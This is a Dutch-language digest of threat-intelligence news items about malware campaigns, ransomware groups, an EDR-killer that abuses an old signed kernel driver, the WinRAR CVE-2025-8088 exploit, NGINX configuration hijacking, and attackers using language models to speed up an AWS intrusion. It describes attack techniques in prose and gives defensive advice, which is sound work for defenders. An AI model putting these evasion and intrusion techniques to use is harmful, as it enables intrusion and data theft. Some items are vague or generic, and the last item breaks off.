De EDR-killer in dit geval is een 64-bit executable die 'EnPortv.sys', een oud EnCase kernel stuurprogramma, misbruikt om beveiligingstools op het host systeem uit te schakelen. Het certificaat van het stuurprogramma was uitgegeven in 2006, verliep in 2010 en werd vervolgens ingetrokken. Echter, omdat het Driver Signature Enforcement systeem in Windows de cryptografische verificatieresultaten en timestamps valideert in plaats van Certificate Revocation Lists (CRLs) te controleren, accepteert het besturingssysteem nog steeds het oude certificaat.

Hoewel Microsoft in Windows 10 versie 1607 de eis stelde dat kernel stuurprogramma's via het Hardware Dev Center moeten worden ondertekend, werd een uitzondering gemaakt voor certificaten die vóór 29 juli 2015 waren uitgegeven, wat in dit geval van toepassing is. Het kernel stuurprogramma wordt geïnstalleerd en geregistreerd als een fake OEM hardware service, waardoor reboot-resistente persistentie wordt gevestigd. De malware gebruikt de driver’s kernel-mode IOCTL interface om service processen te beëindigen, waarmee bestaande Windows-beveiligingen zoals Protected Process Light (PPL) worden omzeild. Er zijn 59 processen die gerelateerd zijn aan diverse EDR- en antivirus tools die worden aangevallen. De kill loop wordt elke seconde uitgevoerd, waardoor alle processen die opnieuw worden gestart onmiddellijk worden beëindigd.

Huntress vermoedt dat de inbraak verband houdt met ransomware activiteiten, hoewel de aanval werd gestopt voordat de uiteindelijke payload werd ingezet. Belangrijke aanbevelingen voor de verdediging zijn onder meer het inschakelen van MFA op alle remote access services, het monitoren van VPN logs op verdachte activiteiten en het inschakelen van HVCI/Memory Integrity om Microsoft’s vulnerable driver blocklist af te dwingen. Daarnaast adviseert Huntress om te monitoren op kernel services die zich voordoen als OEM- of hardware componenten en om WDAC- en ASR-regels te implementeren om kwetsbare ondertekende stuurprogramma's te blokkeren. Bron

De nieuwe cyberespionagegroep Amaranth Dragon, die in verband wordt gebracht met door de staat gesteunde Chinese operaties van APT41, heeft de kwetsbaarheid CVE-2025-8088 in WinRAR misbruikt bij spionageaanvallen op overheids- en wetshandhavingsinstanties. Dit meldt cybersecuritybedrijf Check Point.

De hackers combineerden legitieme tools met de custom Amaranth Loader om versleutelde payloads te leveren vanaf command-and-control (C2)-servers achter de Cloudflare-infrastructuur, voor nauwkeurigere targeting en meer stealth. Volgens de onderzoekers richt Amaranth Dragon zich op organisaties in Singapore, Thailand, Indonesië, Cambodja, Laos en de Filipijnen.

De CVE-2025-8088-kwetsbaarheid kan worden misbruikt om kwaadaardige bestanden naar willekeurige locaties te schrijven door gebruik te maken van de Alternate Data Streams (ADS)-functie in Windows. Verschillende dreigingsactoren hebben dit in zero-day-aanvallen sinds medio 2025 misbruikt om persistentie te bereiken door malware in de Windows Startup-map te plaatsen.

Een rapport van Google Threat Intelligence Group (GTIG) toonde vorige week aan dat CVE-2025-8088 nog steeds actief werd misbruikt door meerdere dreigingsgroepen, waaronder RomCom, APT44, Turla en diverse aan China gelinkte actoren.

Check Point meldt dat Amaranth Dragon op 18 augustus 2025 begon met het misbruiken van de WinRAR-kwetsbaarheid, vier dagen nadat de eerste werkende exploit publiekelijk beschikbaar kwam. De onderzoekers volgen de activiteiten van de kwaadaardige actor echter al sinds maart 2025 en hebben meerdere campagnes geïdentificeerd, die elk beperkt waren tot het targeten van één of twee landen via strikte geofencing. Bovendien waren de lokmiddelen die bij de aanvallen werden gebruikt, gethematiseerd rond geopolitieke of lokale gebeurtenissen.

In aanvallen vóór augustus 2025 vertrouwden de aanvallen van Amaranth Dragon op ZIP-archieven met .LNK- en .BAT-bestanden die de scripts bevatten om de loader van de groep te decoderen en uit te voeren. Toen exploits voor CVE-2025-8088 beschikbaar kwamen, maakte de dreigingsactor gebruik van de kwetsbaarheid om een kwaadaardig script in de Startup-map te plaatsen. In sommige gevallen werd ook een Registry Run-sleutel gemaakt voor redundantie.

Deze mechanismen lanceren een digitaal ondertekend uitvoerbaar bestand dat de Amaranth Loader-payload lanceert met behulp van de DLL-sideloading-techniek. De loader haalt een AES-gecodeerde payload op van een externe URL en decodeert deze in het geheugen. In veel gevallen was deze payload het Havoc C2-post-exploitation framework.

Om verkeer uit landen buiten het aanvalsbereik te filteren, gebruikte de actor C2-servers achter de Cloudflare-infrastructuur die waren geconfigureerd om alleen verkeer uit de beoogde regio's te accepteren.

Check Point observeerde een nieuwe remote access tool, gevolgd als TGAmaranth RAT, die werd ingezet bij recentere Amaranth Dragon-aanvallen. De RAT gebruikt een Telegram-bot voor C2-activiteit. TGAmaranth ondersteunt ook het uploaden/downloaden van bestanden, het maken van screenshots en het weergeven van actieve processen op de host.

Het kan detectie omzeilen door verschillende beveiligingen te implementeren tegen debugging, antivirus en endpoint detection and response (EDR)-oplossingen, waaronder het vervangen van een gehookte ntdll.dll, een Windows-systeembibliotheek die wordt gebruikt voor low-level interacties, door een niet-gehookte kopie.

Gezien de wijdverspreide exploitatie van CVE-2025-8088 door meerdere dreigingsactoren, wordt organisaties aangeraden om te upgraden naar WinRAR versie 7.13 of later (de nieuwste is 7.20), die de kwetsbaarheid verhelpt.

Check Point zegt dat de aanvallen van Amaranth Dragon aantonen dat de actor "technische bekwaamheid en operationele discipline" heeft en zijn tactieken en infrastructuur kan aanpassen voor maximale impact op zijn doelwitten. Het rapport van de onderzoeker bevat indicators of compromise voor archieven, URL's, ondersteunende bestanden en de malware die bij aanvallen wordt gebruikt. YARA-regels zijn ook beschikbaar om verdedigers te helpen bij het detecteren van Amaranth Dragon-intrusies. Bron

Een geavanceerde custom loader genaamd PhantomVAI is opgedoken in wereldwijde phishingcampagnes. Deze malware wordt ingezet om diverse stealers en Remote Access Trojans (RAT's) op gecompromitteerde systemen te plaatsen. De loader opereert door zich voor te doen als legitieme software en maakt gebruik van technieken zoals process hollowing om kwaadaardige payloads in Windows-processen te injecteren. Onderzoekers van verschillende organisaties hebben deze dreiging aanvankelijk onder diverse namen gedocumenteerd, wat leidde tot onduidelijkheid binnen de cybersecuritygemeenschap over de exacte identiteit en capaciteiten.

Intrinsec-analisten hebben vastgesteld dat meerdere beveiligingsleveranciers deze loader onafhankelijk van elkaar hebben beschreven, waarbij namen als VMDetectLoader en Caminho Loader aan dezelfde dreiging werden gekoppeld. Deze inconsistentie in naamgeving ontstond doordat verschillende organisaties losse componenten van de loader afzonderlijk analyseerden. Uit onderzoek blijkt dat alle varianten specifieke kenmerken delen, waaronder de aanwezigheid van een VAI-methode, Portugese strings in de code en het nabootsen van Microsoft.Win32.TaskScheduler.dll op basis van een legitiem GitHub-project.

De loader richt zich op gebruikers over de hele wereld via diverse lokmiddelen in kwaadaardige e-mailbijlagen en links. Na uitvoering downloadt PhantomVAI payloads op afstand en injecteert deze in legitieme Windows-processen, waardoor detectie aanzienlijk lastiger wordt. De malware wordt in verband gebracht met het verspreiden van bekende dreigingen zoals Remcos, XWorm, AsyncRAT, DarkCloud en SmokeLoader in verschillende geografische regio's. De infrastructuur maakt hierbij gebruik van een RunPE-utility om de aanvallen op gebruikers uit te voeren.

Bron

De Interlock ransomware-groep heeft zich gemanifesteerd als een specifieke dreiging binnen het cybersecuritylandschap, waarbij de focus momenteel ligt op de onderwijssector in de Verenigde Staten en het Verenigd Koninkrijk. In tegenstelling tot veel hedendaagse ransomware-operaties die werken volgens een Ransomware-as-a-Service model, functioneert Interlock als een kleiner, toegewijd team. Deze actoren ontwikkelen en beheren hun eigen propriëtaire malware om het grootste deel van hun aanvalsketen te controleren, wat wijst op een hoge mate van verfijning en aanpassingsvermogen.

Hun aanvallen beginnen vaak met een infectie door MintLoader, die waarschijnlijk wordt geïnitieerd via social engineering-technieken die bekend staan als ClickFix. Zodra initiële toegang is verkregen, vaak via een JavaScript-implantaat genaamd NodeSnakeRAT, bewegen de aanvallers zich lateraal door het netwerk. Hierbij maken zij gebruik van geldige accounts en reeds aanwezige binaire bestanden om persistentie te verkrijgen en uitgebreide systeemverkenningen uit te voeren. De impact van een inbraak door Interlock is ernstig en omvat zowel gegevensdiefstal als versleuteling.

De groep is waargenomen bij het gebruik van tools zoals AZcopy om aanzienlijke hoeveelheden data naar cloudopslag te exfiltreren voordat de ransomware wordt uitgerold. Deze tactiek van dubbele afpersing zorgt ervoor dat zij een drukmiddel behouden, zelfs als er back-ups beschikbaar zijn. Analisten hebben vastgesteld dat de groep een unieke set tools inzet om beveiligingsmechanismen uit te schakelen na het vestigen van een voet aan de grond. Specifiek wordt een zero-day kwetsbaarheid in een anti-cheat driver voor games misbruikt om Endpoint Detection and Response en antivirussoftware uit te schakelen. Dit stelt hen in staat hun ransomware-payloads uit te voeren op zowel Windows-endpoints als Nutanix-hypervisoromgevingen.

Bron

Valse negatieven ontwikkelen zich tot een van de duurste stille faalfactoren binnen Security Operations Centers (SOCs). In 2026 worden AI-gegenereerde phishing en meertraps malware-ketens specifiek gebouwd om er aan de oppervlakte schoon uit te zien. Deze dreigingen gedragen zich in eerste instantie normaal en onthullen hun werkelijke intenties pas na daadwerkelijke interactie. Het gevolg is dat reële aanvallen door beveiligingssystemen worden gelabeld als goedaardig of een laag risico. Hierdoor worden bedrijven vaak pas gealarmeerd wanneer een incident al in volle gang is en schade veroorzaakt.

De oorzaak van deze detectieproblemen ligt in de beperkingen van statische scanning. Deze technologie is ontworpen om te beoordelen wat een bestand is, terwijl moderne aanvallen gedefinieerd worden door wat ze doen, vaak pas na uitvoering. Valse negatieven ontstaan onder meer doordat AI-kits content en structuren voortdurend herschrijven om bekende handtekeningen te ontwijken. Daarnaast wordt de eerste stap in een aanvalsketen vaak bewust schoon gehouden, waarbij de daadwerkelijke payload zich achter omleidingen en vervolgstappen bevindt.

Aanvallers maken in toenemende mate gebruik van conditioneel gedrag en menselijke interactie om detectie te omzeilen. Kwaadaardige pagina's of downloads worden soms pas zichtbaar na controles op locatie, tijd of het gebruikte browsertype. Ook triggers zoals klikken, CAPTCHA's, valse knoppen en OAuth-prompts worden ingezet, omdat statische tools deze interacties niet kunnen nabootsen. Tevens wordt legitieme infrastructuur, zoals vertrouwde cloud- en bedrijfsdiensten, misbruikt om via reputatie vertrouwen te wekken. Om het aantal valse negatieven terug te dringen, verschuift de focus naar het valideren van verdachte elementen op basis van hun gedrag tijdens uitvoering in een geïsoleerde omgeving.

Een geavanceerde malwarecampagne is aan het licht gekomen waarbij dreigingsactoren de ValleyRAT-backdoor verspreiden, vermomd als een legitiem installatieprogramma voor de populaire berichtenapplicatie LINE. Deze gerichte aanval focust zich primair op Chinees sprekende gebruikers en maakt gebruik van een misleidend uitvoerbaar bestand om systemen te infiltreren en gevoelige inloggegevens te stelen. De malware hanteert een complexe laadketen die shellcode-uitvoering en legitieme systeembestanden combineert om detectie te ontwijken en een stevige voet aan de grond te krijgen op het systeem van het slachtoffer voor langdurige surveillance.

Na uitvoering activeert de valse installer een infectieproces dat uit meerdere fasen bestaat en specifiek is ontworpen om endpoint-beveiligingscontroles te omzeilen. De malware probeert onmiddellijk Windows Defender te neutraliseren door middel van PowerShell-commando's, waarmee volledige systeemschijven worden uitgesloten van antivirusscans. Tegelijkertijd wordt een kwaadaardige bibliotheek, geïdentificeerd als intel.dll, ingezet om rigoureuze omgevingscontroles uit te voeren. Deze controles omvatten bestandsvergrendeling en het creëren van mutexen om te bepalen of de code wordt uitgevoerd binnen een sandbox-omgeving.

Wanneer de omgeving als veilig wordt beoordeeld, pakt de malware de primaire payload uit, waardoor het apparaat effectief verandert in een volledig gecompromitteerde node. Analisten van Cybereason hebben vastgesteld dat deze campagne gebruikmaakt van de geavanceerde PoolParty Variant 7-injectietechniek. Deze methode stelt de aanvallers in staat om hun kwaadaardige activiteiten te verbergen binnen vertrouwde systeemprocessen, wat detectie aanzienlijk compliceert. Om infectie te voorkomen, wordt geadviseerd installatieprogramma's uitsluitend van officiële bronnen te downloaden.

Bron

Beveiligingsteams van ondernemingen worden geconfronteerd met een nieuwe uitdaging waarbij cybercriminelen in toenemende mate vertrouwde cloudplatforms exploiteren om phishingaanvallen uit te voeren. In plaats van gebruik te maken van verdachte, nieuw geregistreerde domeinen, hosten aanvallers hun kwaadaardige infrastructuur op legitieme diensten zoals Microsoft Azure Blob Storage, Google Firebase en AWS CloudFront. Door deze strategische verschuiving kunnen daders zich verschuilen achter de reputatie van gevestigde technologiebedrijven, wat de detectie door traditionele beveiligingstools aanzienlijk bemoeilijkt.

Deze campagnes richten zich specifiek op zakelijke gebruikers en niet op persoonlijke e-mailaccounts, wat duidt op een gerichte inspanning om bedrijfssystemen te compromitteren en gevoelige inloggegevens te stelen. De aanvallen starten veelal met overtuigende e-mails die links of QR-codes bevatten, waarna slachtoffers via meerdere omleidingslagen worden geleid. Veel van deze campagnes integreren CAPTCHA-uitdagingen en complexe omleidingsketens die ontworpen zijn om geautomatiseerde beveiligingsscanners en statische analysesystemen te omzeilen.

Analisten van Any.Run identificeerden deze groeiende trend tijdens het monitoren van phishing-infrastructuur binnen wereldwijde security operations centers. Uit hun onderzoek blijkt dat de meest risicovolle campagnes gebruikmaken van zogeheten Adversary-in-the-Middle (AiTM) phishing kits. Deze methodiek positioneert de aanvallers als onzichtbare tussenpersonen tussen de slachtoffers en de legitieme authenticatiediensten. Deze techniek stelt criminelen in staat om inloggegevens en sessietokens in real-time te onderscheppen, zelfs wanneer slachtoffers beschermd zijn door multifactorauthenticatie.

Bron

Criminelen hebben de levenscyclus van cloudaanvallen teruggebracht van uren naar slechts enkele minuten door gebruik te maken van kunstmatige intelligentie. Dit blijkt uit bevindingen van het Sysdig Threat Research Team naar aanleiding van een incident in november 2025. Bij deze aanval escaleerden de aanvallers hun rechten van initiële diefstal van inloggegevens naar volledige administratieve privileges in minder dan tien minuten. Ze zetten hierbij Large Language Models in voor het automatiseren van verkenning, het genereren van kwaadaardige code en het nemen van real-time beslissingen tijdens de aanval.

De aanval op de Amazon Web Services-omgeving begon met de ontdekking van geldige inloggegevens in openbaar toegankelijke S3-buckets. Deze opslaglocaties bevatten Retrieval-Augmented Generation data bestemd voor AI-modellen. De gecompromitteerde gegevens behoorden toe aan een Identity and Access Management gebruiker met lees- en schrijfrechten op AWS Lambda en beperkte toegang tot Amazon Bedrock. Ondanks dat de gebruiker over een ReadOnlyAccess-beleid beschikte, konden de aanvallers uitgebreide verkenningen uitvoeren over diverse diensten, waaronder Secrets Manager, Systems Manager, EC2, ECS, RDS en CloudWatch.

Vervolgens misbruikten de actoren de permissies UpdateFunctionCode en UpdateFunctionConfiguration op Lambda om kwaadaardige code te injecteren in een bestaande functie genaamd EC2-init. Na drie pogingen slaagden zij erin een beheerdersaccount met de naam frick te compromitteren door nieuwe toegangssleutels aan te maken. Diverse indicatoren wijzen op het gebruik van AI bij deze operatie. Het Lambda-script bevatte uitgebreide foutafhandeling en een aanpassing van de time-out naar dertig seconden. Daarnaast werden Servische commentaren aangetroffen, zoals de zin kreiraj admin access key, en verwezen bestandsnamen naar een claude-session.

Bron

Cybersecurity News meldt dat het SystemBC-botnet is gekaapt, waardoor meer dan 10.000 apparaten wereldwijd zijn gecompromitteerd. SystemBC, dat actief is sinds 2019, staat bekend om zijn gebruik in grootschalige cyberaanvallen, waaronder ransomware-operaties. Het botnet wordt vaak ingezet als een command-and-control (C2)-infrastructuur voor diverse malwarefamilies, waardoor aanvallers op afstand systemen kunnen besturen en gevoelige gegevens kunnen stelen.
De kaping van het botnet is uitgevoerd door een nog onbekende actor, die de controle over de bestaande infrastructuur heeft overgenomen. Dit omvat de C2-servers die worden gebruikt om met de geïnfecteerde apparaten te communiceren. De exacte methode die bij de kaping is gebruikt, is nog niet bevestigd, maar experts vermoeden dat een kwetsbaarheid in de SystemBC-software of een inlogdiefstal hieraan ten grondslag ligt.
Na de overname hebben de nieuwe beheerders van het botnet de malware-payloads die naar de geïnfecteerde apparaten worden gepusht, gewijzigd. In plaats van de gebruikelijke ransomware of banking trojans, worden de apparaten nu ingezet voor cryptomining. Deze plotse verandering in functionaliteit suggereert dat de nieuwe beheerders primair uit zijn op financieel gewin door middel van het delven van cryptocurrency.
Onderzoekers waarschuwen dat deze situatie onvoorspelbaar is. De nieuwe beheerders van het botnet kunnen op elk moment besluiten om terug te keren naar meer destructieve activiteiten, zoals ransomware-aanvallen of datadiefstal. Het is daarom van cruciaal belang dat organisaties hun systemen controleren op tekenen van infectie en de aanbevolen beveiligingsmaatregelen implementeren.
Het is aanbevolen om alle endpoints te scannen met up-to-date antivirussoftware, firewalls te configureren om verdacht netwerkverkeer te blokkeren en bewustmakingsprogramma's voor werknemers te implementeren om phishing-aanvallen te herkennen. Organisaties wordt aangeraden om hun incident response plannen te herzien en ervoor te zorgen dat ze voorbereid zijn op een mogelijke cyberaanval.
Bron

Een dreigingsactor compromitteert NGINX-servers in een campagne die gebruikersverkeer kaapt en omleidt via de backend-infrastructuur van de aanvaller. NGINX is open-source software voor webverkeerbeheer, die verbindingen tussen gebruikers en servers beheert en wordt gebruikt voor web serving, load balancing, caching en reverse proxying. Cybersecurity News meldt dat dreigingsactoren zich richten op Nginx-servers om potentiële aanvallen uit te voeren. Hoewel de specifieke details over de aard van deze aanvallen en de betrokken actoren nog beperkt zijn, wijst de waarschuwing op een toenemende interesse in Nginx-servers als doelwit.

De kwaadaardige campagne, ontdekt door onderzoekers van DataDog Security Labs, richt zich op NGINX-installaties en Baota hosting management panels die worden gebruikt door sites met Aziatische top-level domeinen (.in, .id, .pe, .bd en .th) en overheids- en onderwijssites (.edu en .gov).

Aanvallers wijzigen bestaande NGINX-configuratiebestanden door kwaadaardige 'location' blocks te injecteren die inkomende verzoeken opvangen op door de aanvaller geselecteerde URL-paden. Vervolgens herschrijven ze deze om de volledige originele URL op te nemen, en sturen ze het verkeer via de 'proxy_pass' directive door naar door de aanvaller gecontroleerde domeinen. De misbruikte directive wordt normaal gesproken gebruikt voor load balancing, waardoor NGINX verzoeken kunnen omleiden via alternatieve backend server groepen om de prestaties of betrouwbaarheid te verbeteren; vandaar dat het misbruik geen beveiligingswaarschuwingen activeert.

Request headers zoals 'Host,' 'X-Real-IP,' 'User-Agent,' en 'Referer' worden bewaard om het verkeer legitiem te laten lijken. De aanval gebruikt een scripted multi-stage toolkit om de NGINX-configuratie injecties uit te voeren. De toolkit werkt in vijf fasen: zx.sh, bt.sh, 4zdh.sh, zdh.sh en ok.sh. Elke fase heeft een specifieke functie, variërend van het downloaden en uitvoeren van andere fasen tot het enumereren van NGINX-configuratielocaties, het injecteren van kwaadaardige configuraties en het exfiltreren van data naar een command-and-control (C2) server.

Het is essentieel voor beheerders van Nginx-servers om waakzaam te zijn en proactieve maatregelen te nemen om hun systemen te beschermen tegen mogelijke aanvallen. Dit omvat het regelmatig bijwerken van de serversoftware naar de nieuwste versies om bekende kwetsbaarheden te patchen, het implementeren van sterke toegangscontroles en het monitoren van serverlogs op verdachte activiteiten. Beheerders van Nginx-servers wordt geadviseerd om de beveiligingsconfiguraties van hun servers te controleren en te versterken, evenals het implementeren van intrusion detection en prevention systemen om verdachte activiteiten te detecteren en te blokkeren. Het is ook raadzaam om regelmatig back-ups van serverdata te maken, zodat gegevens kunnen worden hersteld in geval van een succesvolle aanval. Bron

Een nieuwe malwarecampagne, genaamd Deadvax, is ontdekt waarbij kwaadaardige code wordt verspreid via advertenties. De aanval begint met het tonen van advertenties aan potentiële slachtoffers, die, wanneer erop geklikt wordt, leiden naar landingspagina's die zijn ontworpen om malware te verspreiden.

De onderzoekers van MacKeeper hebben de campagne op 26 januari 2026 ontdekt. De aanvallers maken gebruik van verschillende technieken om detectie te vermijden en hun kwaadaardige code te verbergen. Een van deze technieken is het gebruik van Base64-codering om Terminal commando's te verbergen. Deze commando's downloaden een script van een externe server, waardoor de aanvallers volledige controle over het systeem van het slachtoffer kunnen krijgen.

De malware kan verschillende acties uitvoeren op het geïnfecteerde systeem, waaronder het stelen van gevoelige informatie, het installeren van extra malware en het uitvoeren van cryptomining. De gestolen informatie kan vervolgens worden gebruikt voor identiteitsdiefstal, financiële fraude of andere kwaadaardige doeleinden.

Het is belangrijk om op te merken dat deze campagne nog steeds actief is en dat nieuwe varianten van de malware voortdurend worden ontwikkeld. Daarom is het essentieel dat gebruikers waakzaam blijven en de nodige voorzorgsmaatregelen nemen om zich te beschermen tegen deze dreiging.

Om jezelf te beschermen tegen deze campagne, is het belangrijk om:

- Wees voorzichtig met het klikken op advertenties, vooral van onbekende bronnen. Bron

Een actor biedt momenteel een omvangrijke verzameling van uitsluitend uit e-mailadressen bestaande cryptodatabases te koop aan. De aangeboden gegevens hebben betrekking op de periode van 2021 tot en met 2026 en beslaan diverse geografische regio's, waaronder de Verenigde Staten en verschillende andere landen. De aanbieder stelt een lijst met beschikbare databases en bijbehorende monsters ter beschikking aan geïnteresseerde partijen.

De verkoop van de individuele databases vindt plaats via het platform Telegram, waarbij transacties per specifieke database worden afgehandeld. De verzameling bevat data die specifiek gericht is op de cryptosector. De aangeboden informatie beperkt zich tot e-mailadressen van gebruikers binnen deze sector over de genoemde periode van vijf jaar.

Een nieuwe ransomware-variant genaamd DragonForce is ontdekt, die zich richt op kritieke bedrijfssystemen. De ransomware maakt gebruik van een complex encryptie-algoritme om bestanden te versleutelen, waardoor ze onbruikbaar worden voor de slachtoffers. Na de encryptie wordt een losgeldbrief achtergelaten met instructies over hoe het losgeld betaald moet worden in ruil voor de decryptiesleutel.

De aanval begint vaak met een phishing-e-mail of een kwetsbaarheid in een extern toegankelijk systeem. Zodra de ransomware is binnengedrongen, verspreidt deze zich snel door het netwerk, waarbij het kritieke servers en werkstations infecteert. DragonForce staat bekend om zijn vermogen om anti-virusoplossingen te omzeilen, waardoor detectie moeilijk is.

Onderzoekers hebben vastgesteld dat DragonForce gebruik maakt van verschillende technieken om detectie te vermijden, waaronder het gebruik van geobfuskeerde code en het verwijderen van schaduwkopieën om dataherstel te bemoeilijken. De ransomware maakt ook gebruik van een "double extortion" tactiek, waarbij niet alleen bestanden worden versleuteld, maar ook data wordt gestolen en gedreigd wordt openbaar te maken als het losgeld niet wordt betaald.

Het is essentieel dat bedrijven hun systemen updaten met de nieuwste beveiligingspatches en robuuste back-up strategieën implementeren. Werknemers moeten getraind worden in het herkennen van phishing-e-mails en het vermijden van verdachte links of bijlagen. Regelmatige security audits en penetratietesten kunnen helpen bij het identificeren van kwetsbaarheden voordat ze kunnen worden misbruikt. Bron

Onderzoekers hebben een nieuwe malvertising-campagne ontdekt die gebruikmaakt van betaalde advertenties op Facebook om gebruikers naar een drietraps infectieketen te leiden. Deze aanval begint met misleidende advertenties die gebruikers verleiden om op een link te klikken.

Eenmaal geklikt, leidt de eerste stap naar een landingspagina die zich voordoet als een legitieme website of dienst. Deze pagina is ontworpen om het vertrouwen van de gebruiker te winnen en hen aan te moedigen een bestand te downloaden.

De tweede stap omvat het downloaden van een schadelijk bestand, vaak vermomd als een legitiem programma of document. Dit bestand bevat de eigenlijke malware of een downloader die verdere schadelijke componenten ophaalt.

In de derde en laatste stap wordt de malware op het systeem van het slachtoffer geïnstalleerd en uitgevoerd. Dit kan leiden tot verschillende schadelijke activiteiten, zoals het stelen van persoonlijke gegevens, het installeren van ransomware of het creëren van een backdoor voor toekomstige aanvallen.

De onderzoekers waarschuwen dat deze campagne bijzonder effectief is vanwege het gebruik van betaalde advertenties op Facebook, waardoor de malafide advertenties een groter en meer divers publiek bereiken. Gebruikers wordt aangeraden extra voorzichtig te zijn bij het klikken op links in advertenties en het downloaden van bestanden van onbekende bronnen. Het is belangrijk om de URL van de landingspagina te controleren en ervoor te zorgen dat de gedownloade bestanden afkomstig zijn van een betrouwbare bron. Regelmatige updates van beveiligingssoftware en het gebruik van een betrouwbare antivirusoplossing kunnen ook helpen om dergelijke aanvallen te voorkomen. Bron

Er zijn naar verluidt bedrijfsaccounts en interne gegevens gelekt van diverse in Europa gevestigde bedrijven. De blootgestelde informatie is afkomstig uit uiteenlopende sectoren, waaronder de industriële, financiële en technologische sector. De dataset bevat 134 zakelijke e-mailaccounts met bijbehorende contactgegevens van werknemers en klanten.

Naast contactinformatie maken ook met bcrypt gehashte wachtwoorden en interne bedrijfsgegevens deel uit van het lek. Deze interne data omvatten onder meer transactiegegevens, bedrijfscodes en details over zakelijke partners. Er wordt opgemerkt dat een aanzienlijk deel van de e-mailadressen afkomstig is van persoonlijke domeinen, zoals Gmail.

Het ClickFix-script, een instrument dat kwaadwillenden in staat stelt om hun activiteiten te verbergen, maakt gebruik van DNS TXT-records. De onderzoekers van cybersecuritybedrijf SilentBreak Security hebben ontdekt dat aanvallers DNS TXT-records gebruiken om opdrachten te versturen naar een slachtoffercomputer. Deze techniek maakt het moeilijker om de bron van de aanval te achterhalen, omdat de opdrachten via een legitiem DNS-systeem lopen.

De aanvallers gebruiken een PowerShell-script dat de DNS TXT-records opvraagt van een door de aanvallers gecontroleerde domeinnaam. De TXT-records bevatten gecodeerde opdrachten, die door het PowerShell-script worden gedecodeerd en uitgevoerd. Dit proces stelt aanvallers in staat om op afstand code uit te voeren op de geïnfecteerde systemen.

Het ClickFix-script is ontworpen om verschillende taken uit te voeren, waaronder het verzamelen van informatie over het systeem van het slachtoffer, het downloaden en uitvoeren van extra malware, en het creëren van een backdoor voor toekomstige toegang. De onderzoekers hebben vastgesteld dat de aanvallers gebruik maken van een combinatie van verschillende coderingstechnieken om de opdrachten te verbergen, waaronder Base64-codering en AES-encryptie.

SilentBreak Security meldt dat deze techniek bijzonder effectief is omdat de DNS-servers vaak worden vertrouwd door firewalls en andere beveiligingsmaatregelen. Het misbruiken van DNS TXT-records biedt aanvallers de mogelijkheid om hun kwaadaardige verkeer te maskeren als legitieme DNS-query's, waardoor detectie wordt bemoeilijkt.

Om zich tegen deze dreiging te beschermen, wordt aanbevolen om DNS-verkeer te monitoren op ongebruikelijke patronen en om de toegang tot PowerShell te beperken. Organisaties zouden ook moeten overwegen om DNS-query's naar onbekende of verdachte domeinen te blokkeren. Bron

Cybercriminelen zetten in toenemende mate in op social engineering om traditionele beveiligingsmaatregelen te omzeilen, waarbij een nieuwe campagne genaamd Voicemail Trap specifiek opvalt. Deze aanvalsmethode richt zich op gebruikers via valse voicemailmeldingen die ogenschijnlijk afkomstig zijn van vertrouwde zakelijke entiteiten, vaak met financiële kenmerken. De berichten maken gebruik van overtuigende Duitstalige lokmiddelen om slachtoffers te misleiden. De kern van de aanval berust op het manipuleren van het vertrouwen van de gebruiker in plaats van het inzetten van complexe software-exploits.

De infectieketen start wanneer een doelwit een notificatie ontvangt over een urgent nieuw spraakbericht. De bijgevoegde link leidt de gebruiker naar een gecompromitteerde website die wordt gehost op een subdomein met een bankthema, wat bijdraagt aan de geloofwaardigheid. De landingspagina simuleert een audiospeler, maar speelt het bestand niet direct af. In plaats daarvan wordt de gebruiker geïnstrueerd om een specifiek script te downloaden om het bericht te kunnen beluisteren. Onderzoekers van Censys hebben deze dreiging op 12 januari 2026 geïdentificeerd en namen zesentachtig verschillende webdomeinen waar die deze kwaadaardige lokmiddelen verspreiden.

Het gedownloade bestand betreft in werkelijkheid een Windows Batch-script dat vermomd is als een noodzakelijke audio-codec of update voor mediacomponenten. Wanneer de gebruiker dit script uitvoert, verschijnt er een nagemaakt updatescherm voor Windows Media Player in de console. Terwijl dit scherm op de voorgrond draait, installeert het script op de achtergrond Remotely, een legitieme open-source tool voor beheer op afstand (RMM). Om de misleiding compleet te maken, speelt de malware gelijktijdig een onschuldig audiobestand af via een geminimaliseerd browservenster, waardoor het slachtoffer in de veronderstelling verkeert dat de voicemail correct functioneert.

Bron

Een geavanceerde nieuwe dreiging is geïdentificeerd in de vorm van DesckVB RAT versie 2.9. Deze modulaire Remote Access Trojan is gebouwd op het .NET-framework en is in het begin van 2026 waargenomen in actieve malwarecampagnes. In tegenstelling tot eenvoudigere backdoors vertoont deze dreiging een hoog niveau van operationele volwassenheid. De malware is specifiek ontworpen om langdurige controle over gecompromitteerde systemen te verkrijgen en traditionele verdedigingsmechanismen te omzeilen.

De malware initieert de aanval via een sterk geobfusceerd Windows Script Host JavaScript-bestand. Deze initiële fase voert kritieke instellingstaken uit, waaronder het kopiëren van zichzelf naar openbare gebruikersmappen en uitvoering via de wscript-engine om de activiteit te maskeren. Door gebruik te maken van standaard Windows-componenten kunnen de aanvallers hun kwaadaardige verkeer mengen met legitieme systeemprocessen, wat de detectie door beveiligingsteams compliceert. Na deze initiële uitvoering gaat de infectieketen over in een PowerShell-fase die strenge anti-analysecontroles uitvoert. Er wordt gecontroleerd op internetconnectiviteit en gescand op de aanwezigheid van debugging-tools voordat de kerncomponenten worden gedownload, om zo uitvoering in sandboxes te voorkomen.

De kracht van DesckVB RAT ligt in de stabiliteit en de onopvallende werking. Door gebruik te maken van een zogeheten fileless .NET-loader wordt de malware direct in het geheugen uitgevoerd zonder fysieke sporen op de schijf achter te laten. Deze methode maakt forensische analyse aanzienlijk lastiger. Het meest bepalende kenmerk is echter de robuuste, op plug-ins gebaseerde architectuur waarmee functionaliteiten dynamisch kunnen worden uitgebreid. In plaats van alle functies in één bestand te bundelen, kunnen aanvallers selectief modules implementeren via een aangepast TCP-protocol. Gevalideerde plug-ins omvatten onder meer een keylogger, een webcam-streamer die gebruikmaakt van DirectShow en een module die geïnstalleerde antivirusproducten in kaart brengt. Securityprofessionals wordt geadviseerd zich te richten op gedragsdetectie, zoals het monitoren van ongebruikelijke wscript.exe-uitvoering en PowerShell-scripts die decimale byte-arrays bouwen.

Bron

Een nieuwe phishingcampagne maakt gebruik van nagemaakte RTO Challan (Regional Transport Office) meldingen om malware te verspreiden. Deze aanval is ontworpen om nietsvermoedende gebruikers te misleiden tot het downloaden en uitvoeren van schadelijke bestanden, wat kan leiden tot ernstige systeemcompromittering.

